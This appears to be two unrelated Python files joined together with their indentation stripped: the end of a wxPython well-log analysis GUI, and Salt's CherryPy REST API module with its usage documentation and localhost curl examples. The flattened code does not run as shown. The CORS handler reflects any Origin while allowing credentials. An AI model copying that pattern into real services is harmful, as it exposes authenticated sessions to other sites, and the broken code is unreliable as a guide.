self.PreProsPanel = PreProsPanel(self,mainframe)
vbox3.Add(self.PreProsPanel, flag=wx.EXPAND, border=2)
vbox.Add(vbox3, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=2)
vbox.Add((-1, 7))
vbox4 = wx.BoxSizer(wx.HORIZONTAL)
self.MLPanel = MLPanel(self,mainframe)
vbox4.Add(self.MLPanel, flag=wx.EXPAND, border=2)
vbox.Add(vbox4, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=2)
vbox.Add((-1, 7))
vbox5 = wx.BoxSizer(wx.HORIZONTAL)
vbox5.Add(ExportPanel(self,mainframe), flag=wx.EXPAND, border=2)
vbox.Add(vbox5, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=2)
self.SetSizer(vbox)
class ImportPanel(wx.Panel):
def __init__(self, parent, mainframe, id=-1):
wx.Panel.__init__(self, parent, id=id)
self.parent = parent
self.SetBackgroundColour('white')
self.mainframe = mainframe
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.SetMinSize(200,20)
sizer.AddSpacer(5)
sizer.Add(wx.StaticText(self, label='- Data loading -'), flag=wx.RIGHT, border=2)
sizer.AddSpacer(5)
button = wx.Button(self, label='Import well logs...')
button.Bind(wx.EVT_BUTTON, self.mainframe.OnImport)
sizer.Add(button, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
sizer.AddSpacer(5)
self.SetSizer(sizer)
class QCPanel(wx.Panel):
def __init__(self, parent, mainframe, id=-1):
wx.Panel.__init__(self, parent, id=id)
self.parent = parent
self.SetBackgroundColour('white')
self.mainframe = mainframe
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.SetMinSize(200,20)
sizer.AddSpacer(5)
sizer.Add(wx.StaticText(self, label='- Quality Control -'), flag=wx.ALIGN_LEFT, border=2)
sizer.AddSpacer(5)
self.choice = wx.Choice(self, choices=['Current well - Original',
'Current well - Pre-processed',
'All wells - Original',
'All wells - Pre-processed'])
self.choice.SetSelection(0)
sizer.Add(self.choice, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
sizer.AddSpacer(5)
button = wx.Button(self, label='Generate CrossPlots')
button.Bind(wx.EVT_BUTTON, self.mainframe.OnCrossPlot)
sizer.Add(button, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
sizer.AddSpacer(5)
self.SetSizer(sizer)
class PreProsPanel(wx.Panel):
def __init__(self, parent, mainframe, id=-1):
wx.Panel.__init__(self, parent, id=id)
self.parent = parent
self.SetBackgroundColour('white')
self.mainframe = mainframe
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.SetMinSize(200,20)
sizer.AddSpacer(5)
sizer.Add(wx.StaticText(self, label='- Pre-processing -'), flag=wx.ALIGN_LEFT, border=2)
sizer.AddSpacer(2)
self.choice = wx.Choice(self, choices=['Current well - Original',
'All wells - Original'])
self.choice.SetSelection(0)
sizer.Add(self.choice, proportion=1, flag=wx.ALIGN_LEFT, border=2)
sizer.AddSpacer(5)
self.checkbox_cut = wx.CheckBox(self, label='Cut log (in meters):')
sizer.Add(self.checkbox_cut, flag=wx.ALIGN_LEFT, border=2)
sizer.AddSpacer(2)
self.spinctrl_cut = wx.SpinCtrl(self, initial=0, min=0,max=1000)
sizer.Add(self.spinctrl_cut, proportion=1, flag=wx.ALIGN_LEFT, border=2)
sizer.AddSpacer(20)
self.checkbox_median = wx.CheckBox(self, label='Median filter (in samples):')
sizer.Add(self.checkbox_median, flag=wx.ALIGN_LEFT, border=2)
sizer.AddSpacer(2)
self.spinctrl_median = wx.SpinCtrl(self, initial=21, min=3,max=101)
sizer.Add(self.spinctrl_median, proportion=1, flag=wx.ALIGN_LEFT, border=2)
sizer.AddSpacer(20)
self.checkbox_dbscan = wx.CheckBox(self, label='Outlier detector (DBScan):')
sizer.Add(self.checkbox_dbscan, flag=wx.ALIGN_LEFT, border=2)
sizer.AddSpacer(2)
sizer.Add(wx.StaticText(self, label='EPS:'), flag=wx.ALIGN_LEFT, border=2)
# self.spinctrl_eps = wx.SpinCtrlDouble(self, initial=0.15, min=0.10,max=10.00, inc=0.05)
self.spinctrl_eps = wx.SpinCtrlDouble(self, initial=0.30, min=0.10,max=10.00, inc=0.05)
sizer.Add(self.spinctrl_eps, proportion=1, flag=wx.ALIGN_LEFT, border=2)
sizer.Add(wx.StaticText(self, label='Minimum neighbors:'), flag=wx.ALIGN_LEFT, border=2)
# self.spinctrl_minneigh = wx.SpinCtrl(self, initial=64, min=3,max=100)
self.spinctrl_minneigh = wx.SpinCtrl(self, initial=30, min=3,max=100)
sizer.Add(self.spinctrl_minneigh, proportion=1, flag=wx.ALIGN_LEFT, border=2)
sizer.AddSpacer(20)
button = wx.Button(self, label='Apply')
button.Bind(wx.EVT_BUTTON, self.mainframe.OnPrePross)
sizer.Add(button, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
sizer.AddSpacer(5)
self.SetSizer(sizer)
class MLPanel(wx.Panel):
def __init__(self, parent, mainframe, id=-1):
wx.Panel.__init__(self, parent, id=id)
self.parent = parent
self.SetBackgroundColour('white')
self.mainframe = mainframe
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.SetMinSize(200,20)
sizer.AddSpacer(5)
sizer.Add(wx.StaticText(self, label='- Sonic log prediction -'), flag=wx.ALIGN_LEFT, border=2)
sizer.AddSpacer(5)
self.choicewells = wx.Choice(self, choices=['Current well - Original',
'Current well - Pre-processed',
])
self.choicewells.SetSelection(0)
sizer.Add(self.choicewells, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
sizer.AddSpacer(5)
sizer.Add(wx.StaticText(self, label='Select model:'), flag=wx.ALIGN_LEFT, border=2)
sizer.AddSpacer(2)
self.choicemodel = wx.Choice(self, choices=['Empirical (Gardner)',
'ML (FFNN)',
'ML (Random Forest)',
'ML (RNN)'
])
self.choicemodel.SetSelection(0)
sizer.Add(self.choicemodel, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
sizer.AddSpacer(5)
sizerh = wx.BoxSizer(wx.HORIZONTAL)
predict_button = wx.Button(self, label='Predict log')
predict_button.Bind(wx.EVT_BUTTON, self.mainframe.OnPredictLog)
sizerh.Add(predict_button, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
sizer.Add(sizerh, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
sizer.AddSpacer(5)
self.SetSizer(sizer)
class ExportPanel(wx.Panel):
def __init__(self, parent, mainframe, id=-1):
wx.Panel.__init__(self, parent, id=id)
self.parent = parent
self.SetBackgroundColour('white')
self.mainframe = mainframe
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.SetMinSize(200,20)
sizer.AddSpacer(5)
sizer.Add(wx.StaticText(self, label='- Export Data -'), flag=wx.RIGHT, border=2)
sizer.AddSpacer(5)
button = wx.Button(self, label='Export well log...')
button.Bind(wx.EVT_BUTTON, self.mainframe.OnExport)
sizer.Add(button, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
sizer.AddSpacer(5)
self.SetSizer(sizer)
##############################################################################
# MAIN FUNCTION;
##############################################################################
def main():
# plt.close('all')
# if os.path.exists('{}/PLOTS'.format(os.getcwd())) == False:
# os.mkdir('{}/PLOTS'.format(os.getcwd()))
app = wx.App()
app.SetAppName('GeoMachines')
frame = mainFrame(None, -1, 'GeoMachines',size=wx.Size(1600,800))
frame.Show()
app.MainLoop()
if __name__ == "__main__":
main()
|
app.py | # encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module. Versions 3.2.{2,3,4} are strongly
recommended due to a known `SSL error
<https://bitbucket.org/cherrypy/cherrypy/issue/1298/ssl-not-working>`_
introduced in version 3.2.5. The issue was reportedly resolved with
CherryPy milestone 3.3, but the patch was committed for version 3.6.1.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/saltstack-netapi-client-java
- Python: https://github.com/saltstack/pepper
:configuration:
All authentication is done through Salt's :ref:`external auth
<acl-eauth>` system which requires additional configuration not described
here.
Example production-ready configuration; add to the Salt master config file
and restart the ``salt-master`` and ``salt-api`` daemons:
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
Using only a secure HTTPS connection is strongly recommended since Salt
authentication credentials will be sent over the wire.
A self-signed certificate can be generated using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution function.
Running this function requires pyOpenSSL and the ``salt-call`` script is
available in the ``salt-minion`` package.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways:
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \
-H 'Accept: application/x-yaml' \
-d username=saltdev \
-d password=saltdev \
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent
requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \
-H 'Accept: application/x-yaml' \
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\
-d client=local \
-d tgt='*' \
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \
-c ~/cookies.txt \
-H 'Accept: application/x-yaml' \
-d username=saltdev \
-d password=saltdev \
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \
-b ~/cookies.txt \
-H 'Accept: application/x-yaml' \
-d client=local \
-d tgt='*' \
-d fun=test.ping
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
Commands are sent to a running Salt master via this module by sending HTTP
requests to the URLs detailed below.
.. admonition:: Content negotiation
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
Data sent in :http:method:`post` and :http:method:`put` requests must be in
the format of a list of lowstate dictionaries. This allows multiple commands to
be executed in a single HTTP request. The order of commands in the request
corresponds to the return for each command in the response.
Lowstate, broadly, is a dictionary of values that are mapped to a function
call. This pattern is used pervasively throughout Salt. The functions called
from netapi modules are described in :ref:`Client Interfaces <netapi-clients>`.
The following example (in JSON format) causes Salt to execute two commands, a
command sent to minions as well as a runner function on the master::
[{
"client": "local",
"tgt": "*",
"fun": "test.fib",
"arg": ["10"]
},
{
"client": "runner",
"fun": "jobs.lookup_jid",
"jid": "20130603122505459265"
}]
.. admonition:: x-www-form-urlencoded
Sending JSON or YAML in the request body is simple and most flexible,
however sending data in urlencoded format is also supported with the
caveats below. It is the default format for HTML forms, many JavaScript
libraries, and the :command:`curl` command.
For example, the equivalent to running ``salt '*' test.ping`` is sending
``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body.
Caveats:
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``,
``arg[]=two``. This is not supported; send JSON or YAML instead.
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import StringIO
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
# pylint: disable=import-error
import cherrypy
from cherrypy.lib import cpstats
import yaml
import salt.ext.six as six
# pylint: enable=import-error
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
return out(ret)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
@functools.wraps
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if not isinstance(data, list):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.html_override = cherrypy.Tool('on_start_resource',
html_override_tool, priority=53)
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_handler',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
# Grab all available client interfaces
clients = [name for name, _ in inspect.getmembers(salt.netapi.NetapiClient,
predicate=inspect.ismethod) if not name.startswith('__')]
clients.remove('run') # run method calls client interfaces
return {
'return': "Welcome",
'clients': clients,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-H "Accept: application/x-yaml" \\
-H "X-Auth-Token: d40d1e1e<...snip...>" \\
-d client=local \\
-d tgt='*' \\
-d fun='test.ping' \\
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
fun=test.ping&client=local&tgt=*
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
**Other examples**:
.. code-block:: bash
# Sending multiple positional args with urlencoded:
curl -sSik https://localhost:8000 \\
-d client=local \\
-d tgt='*' \\
-d fun='cmd.run' \\
-d arg='du -sh .' \\
-d arg='/path/to/dir'
# Sending posiitonal args and Keyword args with JSON:
echo '[
{
"client": "local",
"tgt": "*",
"fun": "cmd.run",
"arg": [
"du -sh .",
"/path/to/dir"
],
"kwarg": {
"shell": "/bin/sh",
"template": "jinja"
}
}
]' | curl -sSik https://localhost:8000 \\
-H 'Content-type: application/json' \\
-d@-
# Calling runner functions:
curl -sSik https://localhost:8000 \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682' \\
-d outputter=highstate
# Calling wheel functions:
curl -sSik https://localhost:8000 \\
-d client=wheel \\
-d fun='key.gen_accept' \\
-d id_=dave \\
-d keysize=4096
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-H "Accept: application/x-yaml" \\
-d tgt='*' \\
-d fun='status.diskusage'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
